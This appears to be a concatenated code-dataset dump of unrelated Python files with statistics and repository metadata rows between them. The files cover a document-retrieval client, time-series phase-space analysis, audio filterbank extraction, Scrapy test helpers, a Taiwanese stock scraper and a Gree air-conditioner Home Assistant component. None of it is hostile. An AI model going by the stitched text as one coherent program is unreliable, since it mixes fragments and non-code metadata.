msg = 'Fail to load JSON when retrienving document: %s_%s' % (collection, code)
raise ServerError(msg)
if not jarticle:
logger.warning('Document not found for : %s_%s' % ( collection, code))
return None
if fmt == 'xylose':
xarticle = Article(jarticle)
logger.info('Document loaded: %s_%s' % ( collection, code))
return xarticle
else:
logger.info('Document loaded: %s_%s' % ( collection, code))
return article
def documents(self, collection=None, issn=None, from_date=None,
until_date=None, fmt='xylose'):
offset = 0
while True:
identifiers = self.client.get_article_identifiers(
collection=collection, issn=issn, from_date=from_date,
until_date=until_date, limit=LIMIT, offset=offset)
if len(identifiers) == 0:
raise StopIteration
for identifier in identifiers:
document = self.document(
code=identifier.code,
collection=identifier.collection,
replace_journal_metadata=True,
fmt=fmt
)
yield document
offset += 1000
def collections(self):
return [i for i in self._client.get_collection_identifiers()]
| 29.496674
| 123
| 0.42622
| 1,008
| 13,303
| 5.390873
| 0.15873
| 0.031285
| 0.027604
| 0.020611
| 0.544718
| 0.493927
| 0.467243
| 0.410563
| 0.349466
| 0.323151
| 0
| 0.004057
| 0.48117
| 13,303
| 451
| 124
| 29.496674
| 0.783251
| 0.014057
| 0
| 0.423188
| 0
| 0
| 0.090608
| 0.001923
| 0
| 0
| 0
| 0
| 0
| 1
| 0.075362
| false
| 0
| 0.017391
| 0.005797
| 0.171014
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a5be28a44a12bd589d156a3a7d0bbad6c6678d9a
| 6,705
|
py
|
Python
|
src/pypsr.py
|
wagglefoot/TVAE
|
74f8c5413d3c0d8607af50ddb0d96c4c2d477261
|
[
"MIT"
] | 22
|
2015-03-14T04:23:00.000Z
|
2022-03-24T03:29:22.000Z
|
src/pypsr.py
|
wagglefoot/TVAE
|
74f8c5413d3c0d8607af50ddb0d96c4c2d477261
|
[
"MIT"
] | null | null | null |
src/pypsr.py
|
wagglefoot/TVAE
|
74f8c5413d3c0d8607af50ddb0d96c4c2d477261
|
[
"MIT"
] | 15
|
2015-02-04T13:09:27.000Z
|
2022-03-24T03:29:24.000Z
|
from operator import sub
import numpy as np
from sklearn import metrics
from sklearn.neighbors import NearestNeighbors
from toolz import curry
def global_false_nearest_neighbors(x, lag, min_dims=1, max_dims=10, **cutoffs):
"""
Across a range of embedding dimensions $d$, embeds $x(t)$ with lag $\tau$, finds all nearest neighbors,
and computes the percentage of neighbors that that remain neighbors when an additional dimension is unfolded.
See [1] for more information.
Parameters
----------
x : array-like
Original signal $x(t).
lag : int
Time lag $\tau$ in units of the sampling time $h$ of $x(t)$.
min_dims : int, optional
The smallest embedding dimension $d$ to test.
max_dims : int, optional
The largest embedding dimension $d$ to test.
relative_distance_cutoff : float, optional
The cutoff for determining neighborliness,
in distance increase relative to the original distance between neighboring points.
The default, 15, is suggested in [1] (p. 41).
relative_radius_cutoff : float, optional
The cutoff for determining neighborliness,
in distance increase relative to the radius of the attractor.
The default, 2, is suggested in [1] (p. 42).
Returns
-------
dims : ndarray
The tested dimensions $d$.
gfnn : ndarray
The percentage of nearest neighbors that are false neighbors at each dimension.
See Also
--------
reconstruct
References
----------
[1] Arbanel, H. D. (1996). *Analysis of Observed Chaotic Data* (pp. 40-43). New York: Springer.
"""
x = _vector(x)
dimensions = np.arange(min_dims, max_dims + 1)
false_neighbor_pcts = np.array([_gfnn(x, lag, n_dims, **cutoffs) for n_dims in dimensions])
return dimensions, false_neighbor_pcts
def _gfnn(x, lag, n_dims, **cutoffs):
# Global false nearest neighbors at a particular dimension.
# Returns percent of all nearest neighbors that are still neighbors when the next dimension is unfolded.
# Neighbors that can't be embedded due to lack of data are not counted in the denominator.
offset = lag*n_dims
is_true_neighbor = _is_true_neighbor(x, _radius(x), offset)
return np.mean([
not is_true_neighbor(indices, distance, **cutoffs)
for indices, distance in _nearest_neighbors(reconstruct(x, lag, n_dims))
if (indices + offset < x.size).all()
])
def _radius(x):
# Per Arbanel (p. 42):
# "the nominal 'radius' of the attractor defined as the RMS value of the data about its mean."
return np.sqrt(((x - x.mean())**2).mean())
@curry
def _is_true_neighbor(
x, attractor_radius, offset, indices, distance,
relative_distance_cutoff=15,
relative_radius_cutoff=2
):
distance_increase = np.abs(sub(*x[indices + offset]))
return (distance_increase / distance < relative_distance_cutoff and
distance_increase / attractor_radius < relative_radius_cutoff)
def _nearest_neighbors(y):
"""
Wrapper for sklearn.neighbors.NearestNeighbors.
Yields the indices of the neighboring points, and the distance between them.
"""
distances, indices = NearestNeighbors(n_neighbors=2, algorithm='kd_tree').fit(y).kneighbors(y)
for distance, index in zip(distances, indices):
yield index, distance[1]
def reconstruct(x, lag, n_dims):
"""Phase-space reconstruction.
Given a signal $x(t)$, dimensionality $d$, and lag $\tau$, return the reconstructed signal
\[
\mathbf{y}(t) = [x(t), x(t + \tau), \ldots, x(t + (d - 1)\tau)].
\]
Parameters
----------
x : array-like
Original signal $x(t)$.
lag : int
Time lag $\tau$ in units of the sampling time $h$ of $x(t)$.
n_dims : int
Embedding dimension $d$.
Returns
-------
ndarray
$\mathbf{y}(t)$ as an array with $d$ columns.
"""
x = _vector(x)
if lag * (n_dims - 1) >= x.shape[0] // 2:
raise ValueError('longest lag cannot be longer than half the length of x(t)')
lags = lag * np.arange(n_dims)
return np.vstack(x[lag:lag - lags[-1] or None] for lag in lags).transpose()
def ami(x, y=None, n_bins=10):
"""Calculate the average mutual information between $x(t)$ and $y(t)$.
Parameters
----------
x : array-like
y : array-like, optional
$x(t)$ and $y(t)$.
If only `x` is passed, it must have two columns;
the first column defines $x(t)$ and the second $y(t)$.
n_bins : int
The number of bins to use when computing the joint histogram.
Returns
-------
scalar
Average mutual information between $x(t)$ and $y(t)$, in nats (natural log equivalent of bits).
See Also
--------
lagged_ami
References
----------
Arbanel, H. D. (1996). *Analysis of Observed Chaotic Data* (p. 28). New York: Springer.
"""
x, y = _vector_pair(x, y)
if x.shape[0] != y.shape[0]:
raise ValueError('timeseries must have the same length')
return metrics.mutual_info_score(None, None, contingency=np.histogram2d(x, y, bins=n_bins)[0])
def lagged_ami(x, min_lag=0, max_lag=None, lag_step=1, n_bins=10):
"""Calculate the average mutual information between $x(t)$ and $x(t + \tau)$, at multiple values of $\tau$.
Parameters
----------
x : array-like
$x(t)$.
min_lag : int, optional
The shortest lag to evaluate, in units of the sampling period $h$ of $x(t)$.
max_lag : int, optional
The longest lag to evaluate, in units of $h$.
lag_step : int, optional
The step between lags to evaluate, in units of $h$.
n_bins : int
The number of bins to use when computing the joint histogram in order to calculate mutual information.
See |ami|.
Returns
-------
lags : ndarray
The evaluated lags $\tau_i$, in units of $h$.
amis : ndarray
The average mutual information between $x(t)$ and $x(t + \tau_i)$.
See Also
--------
ami
"""
if max_lag is None:
max_lag = x.shape[0]//2
lags = np.arange(min_lag, max_lag, lag_step)
amis = [ami(reconstruct(x, lag, 2), n_bins=n_bins) for lag in lags]
return lags, np.array(amis)
def _vector_pair(a, b):
a = np.squeeze(a)
if b is None:
if a.ndim != 2 or a.shape[1] != 2:
raise ValueError('with one input, array must have be 2D with two columns')
a, b = a[:, 0], a[:, 1]
return a, np.squeeze(b)
def _vector(x):
x = np.squeeze(x)
if x.ndim != 1:
raise ValueError('x(t) must be a 1-dimensional signal')
return x
| 31.186047
| 113
| 0.631022
| 967
| 6,705
| 4.282316
| 0.240951
| 0.010142
| 0.01304
| 0.019319
| 0.242454
| 0.20285
| 0.177493
| 0.177493
| 0.177493
| 0.147549
| 0
| 0.01254
| 0.250708
| 6,705
| 214
| 114
| 31.331776
| 0.811704
| 0.537509
| 0
| 0.032258
| 0
| 0
| 0.069819
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.16129
| false
| 0
| 0.080645
| 0.016129
| 0.387097
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c01c3ac689a157ca3b1ed4911d58fd47e935434
| 1,050
|
py
|
Python
|
local/make_fbank.py
|
coolEphemeroptera/AESRC2020
|
b64cdeeaaf74e8c1a741930b3a47dc8dcadca8de
|
[
"Apache-2.0"
] | 35
|
2020-09-26T13:40:16.000Z
|
2022-03-22T19:42:20.000Z
|
local/make_fbank.py
|
coolEphemeroptera/ARNet
|
b64cdeeaaf74e8c1a741930b3a47dc8dcadca8de
|
[
"Apache-2.0"
] | 4
|
2021-04-10T13:05:52.000Z
|
2022-03-14T03:22:32.000Z
|
local/make_fbank.py
|
coolEphemeroptera/ARNet
|
b64cdeeaaf74e8c1a741930b3a47dc8dcadca8de
|
[
"Apache-2.0"
] | 7
|
2020-09-26T15:52:45.000Z
|
2021-06-11T05:05:23.000Z
|
import python_speech_features as psf
import soundfile as sf
# import scipy.io.wavfile as wav
import pickle as pkl
import sys
import os
import re
# linux to windows ่ทฏๅพ่ฝฌๆข
def path_lin2win(path):
pattern = "/[a-z]/"
position = re.findall(pattern,path)[0][1].upper()
return re.sub(pattern,"%s:/"%position,path)
# ๅญๅจๆไปถ
def save(data,path):
f = open(path,"wb")
pkl.dump(data,f)
f.close()
def path2utt(path):
return path.split('/')[-1].split('.')[0]
def fbank(path):
# path = path_lin2win(path) # windows path
y,sr = sf.read(path)
mel = psf.fbank(y,samplerate=sr,nfilt=80)[0]
return mel
if __name__ == "__main__":
audio_file = sys.argv[1]
# audio_file = r"E:/LIBRISPEECH/LibriSpeech/dev/dev-clean/1272/128104/1272-128104-0000.flac"
out_file = sys.argv[2]
dir = os.path.dirname(out_file)
if not os.path.isdir(dir):os.mkdir(out_file)
mel = fbank(audio_file)
save(mel,out_file)
print(path2utt(out_file),mel.shape[0])
exit()
| 23.863636
| 97
| 0.631429
| 161
| 1,050
| 3.993789
| 0.484472
| 0.054432
| 0.046656
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.046341
| 0.219048
| 1,050
| 43
| 98
| 24.418605
| 0.737805
| 0.179048
| 0
| 0
| 0
| 0
| 0.028395
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.137931
| false
| 0
| 0.206897
| 0.034483
| 0.448276
| 0.034483
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c0299abc0c111e544b5842dcd9b42f82f6088c5
| 1,344
|
py
|
Python
|
tests/__init__.py
|
jun-kai-xin/douban
|
989a797de467f5a9a8b77a05fa8242bebf657a51
|
[
"MIT"
] | null | null | null |
tests/__init__.py
|
jun-kai-xin/douban
|
989a797de467f5a9a8b77a05fa8242bebf657a51
|
[
"MIT"
] | null | null | null |
tests/__init__.py
|
jun-kai-xin/douban
|
989a797de467f5a9a8b77a05fa8242bebf657a51
|
[
"MIT"
] | null | null | null |
def fake_response_from_file(file_name, url=None, meta=None):
import os
import codecs
from scrapy.http import HtmlResponse, Request
if not url:
url = 'http://www.example.com'
_meta = {'mid': 1291844, 'login': False} # ๅฟ
่ฆ็ไฟกๆฏ๏ผ้ไพฟๅผไธไธชๅฐฑ่กไบ
if meta:
meta.update(_meta)
else:
meta = _meta
request = Request(url=url, meta=meta)
if not file_name[0] == '/':
responses_dir = os.path.dirname(os.path.realpath(__file__))
file_path = os.path.join(responses_dir, file_name)
else:
file_path = file_name
with codecs.open(file_path, 'r', 'utf-8') as f:
file_content = f.read()
response = HtmlResponse(url=url,
encoding='utf-8',
request=request,
body=file_content)
return response
def fake_response_from_url(url, headers=None, meta=None):
import requests
from scrapy.http import HtmlResponse, Request
resp = requests.get(url, headers=headers)
_meta = {'mid': 1291844, 'login': False} # ๅฟ
่ฆ็ไฟกๆฏ๏ผ้ไพฟๅผไธไธชๅฐฑ่กไบ
if meta:
meta.update(_meta)
else:
meta = _meta
return HtmlResponse(url=url, status=resp.status_code, body=resp.text,
encoding='utf-8', request=Request(url=url, meta=meta))
| 28.595745
| 78
| 0.590774
| 165
| 1,344
| 4.642424
| 0.333333
| 0.046997
| 0.039164
| 0.049608
| 0.4047
| 0.355091
| 0.180157
| 0.180157
| 0.180157
| 0.180157
| 0
| 0.019088
| 0.298363
| 1,344
| 46
| 79
| 29.217391
| 0.793213
| 0.021577
| 0
| 0.371429
| 0
| 0
| 0.041921
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057143
| false
| 0
| 0.142857
| 0
| 0.257143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c045b5de4e55fe90b3f8563b224a0193ac2dff7
| 6,917
|
py
|
Python
|
stockBOT/Discord/fc_info.py
|
Chenct-jonathan/LokiHub
|
7193589151e88f4e66aee6457926e565d0023fa1
|
[
"MIT"
] | 17
|
2020-11-25T07:40:18.000Z
|
2022-03-07T03:29:18.000Z
|
stockBOT/Discord/fc_info.py
|
Chenct-jonathan/LokiHub
|
7193589151e88f4e66aee6457926e565d0023fa1
|
[
"MIT"
] | 8
|
2020-12-18T13:23:59.000Z
|
2021-10-03T21:41:50.000Z
|
stockBOT/Discord/fc_info.py
|
Chenct-jonathan/LokiHub
|
7193589151e88f4e66aee6457926e565d0023fa1
|
[
"MIT"
] | 43
|
2020-12-02T09:03:57.000Z
|
2021-12-23T03:30:25.000Z
|
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
from bs4 import BeautifulSoup
import requests
from requests import post
from requests import codes
def information(symbol):
URL = "https://goodinfo.tw/StockInfo/StockDetail.asp?STOCK_ID="+ symbol
headers = {'user-agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'}
r = requests.post(url=URL,headers=headers)
html =BeautifulSoup(r.content, "html.parser")
result_infoDICT = {}
table = html.findAll("table")[40]
table_row_name=table.findAll("tr")[1]
td_name = table_row_name.findAll("td")[1]
name = td_name.text
result_infoDICT["name"] = name
table_row_industry=table.findAll("tr")[2]
td_industry=table_row_industry.findAll("td")[1]
industry=td_industry.text
result_infoDICT["industry"] = industry
table_row_value=table.findAll("tr")[4]
td_value = table_row_value.findAll("td")[3]
value = td_value.text
result_infoDICT["value"] = value
table_row_business=table.findAll("tr")[14]
td_business = table_row_business.findAll("td")[0]
business = td_business.text
result_infoDICT["business"] = business
return result_infoDICT
def growth(symbol):
URL = "https://goodinfo.tw/StockInfo/StockFinDetail.asp?RPT_CAT=XX_M_QUAR_ACC&STOCK_ID="+ symbol
headers = {'user-agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'}
r = requests.post(url=URL,headers=headers)
html =BeautifulSoup(r.content, "html.parser")
result_growthDICT = {}
table = html.findAll("table")[16]
table_row_quarter=table.findAll("tr")[0]
th_quarter = table_row_quarter.findAll("th")[1]
quarter = th_quarter.text
result_growthDICT["quarter"] = quarter
table_row_revenue=table.findAll("tr")[14]
td_revenue = table_row_revenue.findAll("td")[1]
revenue_YOY = td_revenue.text
result_growthDICT["revenue_YOY"] = revenue_YOY
table_row_gross_profit = table.findAll("tr")[15]
td_gross_profit = table_row_gross_profit.findAll("td")[1]
gross_profit_YOY = td_gross_profit.text
result_growthDICT["gross_profit_YOY"] = gross_profit_YOY
table_row_operating_income=table.findAll("tr")[16]
td_operating_income = table_row_operating_income.findAll("td")[1]
operating_income_YOY = td_operating_income.text
result_growthDICT["operating_income_YOY"] = operating_income_YOY
table_row_NIBT=table.findAll("tr")[17]
td_NIBT = table_row_NIBT.findAll("td")[1]
NIBT_YOY = td_NIBT.text
result_growthDICT["NIBT_YOY"] = NIBT_YOY
table_row_NI=table.findAll("tr")[18]
td_NI = table_row_NI.findAll("td")[1]
NI_YOY = td_NI.text
result_growthDICT["NI_YOY"] = NI_YOY
table_row_EPS=table.findAll("tr")[20]
td_EPS = table_row_EPS.findAll("td")[1]
EPS_YOY = td_EPS.text
result_growthDICT["EPS_YOY"] = EPS_YOY
table_row_total_assets_growth=table.findAll("tr")[50]
td_total_assets_growth = table_row_total_assets_growth.findAll("td")[1]
total_assets_growth = td_total_assets_growth.text
result_growthDICT["total_assets_growth"] = total_assets_growth
return result_growthDICT
def profitability(symbol):
URL = "https://goodinfo.tw/StockInfo/StockFinDetail.asp?RPT_CAT=XX_M_QUAR_ACC&STOCK_ID="+ symbol
headers = {'user-agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'}
r = requests.post(url=URL,headers=headers)
html =BeautifulSoup(r.content, "html.parser")
result_profitabilityDICT = {}
table = html.findAll("table")[16]
table_row_quarter=table.findAll("tr")[0]
th_quarter = table_row_quarter.findAll("th")[1]
quarter = th_quarter.text
result_profitabilityDICT["quarter"] = quarter
table_row_GPM=table.findAll("tr")[1]
td_GPM = table_row_GPM.findAll("td")[1]
GPM = td_GPM.text
result_profitabilityDICT["GPM"] = GPM
table_row_OPM=table.findAll("tr")[2]
td_OPM = table_row_OPM.findAll("td")[1]
OPM = td_OPM.text
result_profitabilityDICT["OPM"] = OPM
table_row_PTPM=table.findAll("tr")[3]
td_PTPM = table_row_PTPM.findAll("td")[1]
PTPM = td_PTPM.text
result_profitabilityDICT["PTPM"] = PTPM
table_row_NPM=table.findAll("tr")[4]
td_NPM = table_row_NPM.findAll("td")[1]
NPM = td_NPM.text
result_profitabilityDICT["NPM"] = NPM
table_row_EPS=table.findAll("tr")[7]
td_EPS = table_row_EPS.findAll("td")[1]
EPS = td_EPS.text
result_profitabilityDICT["EPS"] = EPS
table_row_NASPS=table.findAll("tr")[8]
td_NASPS = table_row_NASPS.findAll("td")[1]
NASPS = td_NASPS.text
result_profitabilityDICT["NASPS"] = NASPS
table_row_ROW=table.findAll("tr")[9]
td_ROE = table_row_ROW.findAll("td")[1]
ROE = td_ROE.text
result_profitabilityDICT["ROE"] = ROE
table_row_ROA=table.findAll("tr")[11]
td_ROA = table_row_ROA.findAll("td")[1]
ROA = td_ROA.text
result_profitabilityDICT["ROA"] = ROA
return result_profitabilityDICT
def safety(symbol):
URL = "https://goodinfo.tw/StockInfo/StockFinDetail.asp?RPT_CAT=XX_M_QUAR_ACC&STOCK_ID="+ symbol
headers = {'user-agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'}
r = requests.post(url=URL,headers=headers)
html =BeautifulSoup(r.content, "html.parser")
result_safetyDICT = {}
table = html.findAll("table")[16]
table_row_quarter=table.findAll("tr")[75]
th_quarter = table_row_quarter.findAll("td")[1]
quarter = th_quarter.text
result_safetyDICT["quarter"] = quarter
table_row_CR=table.findAll("tr")[76]
td_CR = table_row_CR.findAll("td")[1]
CR = td_CR.text
result_safetyDICT["CR"] = CR
table_row_QR=table.findAll("tr")[77]
td_QR = table_row_QR.findAll("td")[1]
QR = td_QR.text
result_safetyDICT["QR"] = QR
table_row_current_ratio=table.findAll("tr")[78]
td_current_ratio = table_row_current_ratio.findAll("td")[1]
current_ratio = td_current_ratio.text
result_safetyDICT["current_ratio"] = current_ratio
table_row_ICR=table.findAll("tr")[79]
td_ICR = table_row_ICR.findAll("td")[1]
ICR = td_ICR.text
result_safetyDICT["ICR"] = ICR
table_row_OCFR=table.findAll("tr")[80]
td_OCFR = table_row_OCFR.findAll("td")[1]
OCFR = td_OCFR.text
result_safetyDICT["OCFR"] = OCFR
table_row_DR=table.findAll("tr")[56]
td_DR = table_row_DR.findAll("td")[1]
DR = td_DR.text
result_safetyDICT["DR"] = DR
return result_safetyDICT
| 32.474178
| 134
| 0.675293
| 976
| 6,917
| 4.506148
| 0.128074
| 0.101864
| 0.089131
| 0.020009
| 0.359936
| 0.31719
| 0.28513
| 0.28513
| 0.28513
| 0.271942
| 0
| 0.031947
| 0.189967
| 6,917
| 213
| 135
| 32.474178
| 0.752989
| 0.006072
| 0
| 0.182432
| 0
| 0.027027
| 0.160774
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027027
| false
| 0
| 0.027027
| 0
| 0.081081
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c091171ce7d459ab7bdf55ac4292ac21cd0a68c
| 12,007
|
py
|
Python
|
custom_components/climate/gree.py
|
ardeus-ua/gree-python-api
|
ecfbdef34ff99fc0822f70be17cdeb6c625fd276
|
[
"MIT"
] | 1
|
2018-12-10T17:32:48.000Z
|
2018-12-10T17:32:48.000Z
|
custom_components/climate/gree.py
|
ardeus-ua/gree-python-api
|
ecfbdef34ff99fc0822f70be17cdeb6c625fd276
|
[
"MIT"
] | null | null | null |
custom_components/climate/gree.py
|
ardeus-ua/gree-python-api
|
ecfbdef34ff99fc0822f70be17cdeb6c625fd276
|
[
"MIT"
] | 1
|
2020-08-11T14:51:04.000Z
|
2020-08-11T14:51:04.000Z
|
import asyncio
import logging
import binascii
import socket
import os.path
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.components.climate import (DOMAIN, ClimateDevice, PLATFORM_SCHEMA, STATE_IDLE, STATE_HEAT, STATE_COOL, STATE_AUTO, STATE_DRY,
SUPPORT_OPERATION_MODE, SUPPORT_TARGET_TEMPERATURE, SUPPORT_FAN_MODE, SUPPORT_SWING_MODE)
from homeassistant.const import (ATTR_UNIT_OF_MEASUREMENT, ATTR_TEMPERATURE, CONF_NAME, CONF_HOST, CONF_MAC, CONF_TIMEOUT, CONF_CUSTOMIZE)
from homeassistant.helpers.event import (async_track_state_change)
from homeassistant.core import callback
from homeassistant.helpers.restore_state import RestoreEntity
from configparser import ConfigParser
from base64 import b64encode, b64decode
REQUIREMENTS = ['gree==0.3.2']
_LOGGER = logging.getLogger(__name__)
SUPPORT_FLAGS = SUPPORT_TARGET_TEMPERATURE | SUPPORT_OPERATION_MODE | SUPPORT_FAN_MODE | SUPPORT_SWING_MODE
CONF_UNIQUE_KEY = 'unique_key'
CONF_MIN_TEMP = 'min_temp'
CONF_MAX_TEMP = 'max_temp'
CONF_TARGET_TEMP = 'target_temp'
CONF_TEMP_SENSOR = 'temp_sensor'
CONF_OPERATIONS = 'operations'
CONF_FAN_MODES = 'fan_modes'
CONF_SWING_LIST = 'swing_list'
CONF_DEFAULT_OPERATION = 'default_operation'
CONF_DEFAULT_FAN_MODE = 'default_fan_mode'
CONF_DEFAULT_SWING_MODE = 'default_swing_mode'
CONF_DEFAULT_OPERATION_FROM_IDLE = 'default_operation_from_idle'
STATE_FAN = 'fan'
STATE_OFF = 'off'
DEFAULT_NAME = 'GREE AC Climate'
DEFAULT_TIMEOUT = 10
DEFAULT_RETRY = 3
DEFAULT_MIN_TEMP = 16
DEFAULT_MAX_TEMP = 30
DEFAULT_TARGET_TEMP = 20
DEFAULT_OPERATION_LIST = [STATE_OFF, STATE_AUTO, STATE_COOL, STATE_DRY, STATE_FAN, STATE_HEAT]
OPERATION_LIST_MAP = {
STATE_AUTO: 0,
STATE_COOL: 1,
STATE_DRY: 2,
STATE_FAN: 3,
STATE_HEAT: 4,
}
DEFAULT_FAN_MODE_LIST = ['auto', 'low', 'medium-low', 'medium', 'medium-high', 'high']
FAN_MODE_MAP = {
'auto': 0,
'low': 1,
'medium-low': 2,
'medium': 3,
'medium-high': 4,
'high': 5
}
DEFAULT_SWING_LIST = ['default', 'swing-full-range', 'fixed-up', 'fixed-middle', 'fixed-down', 'swing-up', 'swing-middle', 'swing-down']
SWING_MAP = {
'default': 0,
'swing-full-range': 1,
'fixed-up': 2,
'fixed-middle': 4,
'fixed-down': 6,
'swing-up': 11,
'swing-middle': 9,
'swing-down': 7
}
DEFAULT_OPERATION = 'idle'
DEFAULT_FAN_MODE = 'auto'
DEFAULT_SWING_MODE = 'default'
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Required(CONF_HOST): cv.string,
vol.Required(CONF_MAC): cv.string,
vol.Required(CONF_UNIQUE_KEY): cv.string,
vol.Optional(CONF_TIMEOUT, default=DEFAULT_TIMEOUT): cv.positive_int,
vol.Optional(CONF_MIN_TEMP, default=DEFAULT_MIN_TEMP): cv.positive_int,
vol.Optional(CONF_MAX_TEMP, default=DEFAULT_MAX_TEMP): cv.positive_int,
vol.Optional(CONF_TARGET_TEMP, default=DEFAULT_TARGET_TEMP): cv.positive_int,
vol.Optional(CONF_TEMP_SENSOR): cv.entity_id,
vol.Optional(CONF_DEFAULT_OPERATION, default=DEFAULT_OPERATION): cv.string,
vol.Optional(CONF_DEFAULT_FAN_MODE, default=DEFAULT_FAN_MODE): cv.string,
vol.Optional(CONF_DEFAULT_SWING_MODE, default=DEFAULT_SWING_MODE): cv.string,
vol.Optional(CONF_DEFAULT_OPERATION_FROM_IDLE): cv.string
})
@asyncio.coroutine
def async_setup_platform(hass, config, async_add_devices, discovery_info=None):
"""Set up the GREE platform."""
name = config.get(CONF_NAME)
ip_addr = config.get(CONF_HOST)
mac_addr = config.get(CONF_MAC)
unique_key = config.get(CONF_UNIQUE_KEY).encode()
min_temp = config.get(CONF_MIN_TEMP)
max_temp = config.get(CONF_MAX_TEMP)
target_temp = config.get(CONF_TARGET_TEMP)
temp_sensor_entity_id = config.get(CONF_TEMP_SENSOR)
operation_list = DEFAULT_OPERATION_LIST
swing_list = DEFAULT_SWING_LIST
fan_list = DEFAULT_FAN_MODE_LIST
default_operation = config.get(CONF_DEFAULT_OPERATION)
default_fan_mode = config.get(CONF_DEFAULT_FAN_MODE)
default_swing_mode = config.get(CONF_DEFAULT_SWING_MODE)
default_operation_from_idle = config.get(CONF_DEFAULT_OPERATION_FROM_IDLE)
import gree
gree_device = gree.GreeDevice(mac_addr, unique_key, ip_addr)
try:
gree_device.update_status()
except socket.timeout:
_LOGGER.error("Failed to connect to Gree Device")
async_add_devices([
GreeClimate(hass, name, gree_device, min_temp, max_temp, target_temp, temp_sensor_entity_id, operation_list, fan_list, swing_list, default_operation, default_fan_mode, default_swing_mode, default_operation_from_idle)
])
ATTR_VALUE = 'value'
DEFAULT_VALUE = True
def gree_set_health(call):
value = call.data.get(ATTR_VALUE, DEFAULT_VALUE)
gree_device.send_command(health_mode=bool(value))
hass.services.async_register(DOMAIN, 'gree_set_health', gree_set_health)
class GreeClimate(ClimateDevice):
def __init__(self, hass, name, gree_device, min_temp, max_temp, target_temp, temp_sensor_entity_id, operation_list, fan_list, swing_list, default_operation, default_fan_mode, default_swing_mode, default_operation_from_idle):
"""Initialize the Gree Climate device."""
self.hass = hass
self._name = name
self._min_temp = min_temp
self._max_temp = max_temp
self._target_temperature = target_temp
self._target_temperature_step = 1
self._unit_of_measurement = hass.config.units.temperature_unit
self._current_temperature = 0
self._temp_sensor_entity_id = temp_sensor_entity_id
self._current_operation = default_operation
self._current_fan_mode = default_fan_mode
self._current_swing_mode = default_swing_mode
self._operation_list = operation_list
self._fan_list = fan_list
self._swing_list = swing_list
self._default_operation_from_idle = default_operation_from_idle
self._gree_device = gree_device
if temp_sensor_entity_id:
async_track_state_change(
hass, temp_sensor_entity_id, self._async_temp_sensor_changed)
sensor_state = hass.states.get(temp_sensor_entity_id)
if sensor_state:
self._async_update_current_temp(sensor_state)
def send_command(self):
power = True
mode = None
operation = self._current_operation.lower()
if operation == 'off':
power = False
else:
mode = OPERATION_LIST_MAP[operation]
fan_speed = FAN_MODE_MAP[self._current_fan_mode.lower()]
temperature = self._target_temperature
swing = SWING_MAP[self._current_swing_mode.lower()]
for retry in range(DEFAULT_RETRY):
try:
self._gree_device.send_command(power_on=power, temperature=temperature, fan_speed=fan_speed, mode=mode, swing=swing)
except (socket.timeout, ValueError):
try:
self._gree_device.update_status()
except socket.timeout:
if retry == DEFAULT_RETRY-1:
_LOGGER.error("Failed to send command to Gree Device")
@asyncio.coroutine
def _async_temp_sensor_changed(self, entity_id, old_state, new_state):
"""Handle temperature changes."""
if new_state is None:
return
self._async_update_current_temp(new_state)
yield from self.async_update_ha_state()
@callback
def _async_update_current_temp(self, state):
"""Update thermostat with latest state from sensor."""
unit = state.attributes.get(ATTR_UNIT_OF_MEASUREMENT)
try:
_state = state.state
if self.represents_float(_state):
self._current_temperature = self.hass.config.units.temperature(
float(_state), unit)
except ValueError as ex:
_LOGGER.error('Unable to update from sensor: %s', ex)
def represents_float(self, s):
try:
float(s)
return True
except ValueError:
return False
@property
def should_poll(self):
"""Return the polling state."""
return False
@property
def name(self):
"""Return the name of the climate device."""
return self._name
@property
def temperature_unit(self):
"""Return the unit of measurement."""
return self._unit_of_measurement
@property
def current_temperature(self):
"""Return the current temperature."""
return self._current_temperature
@property
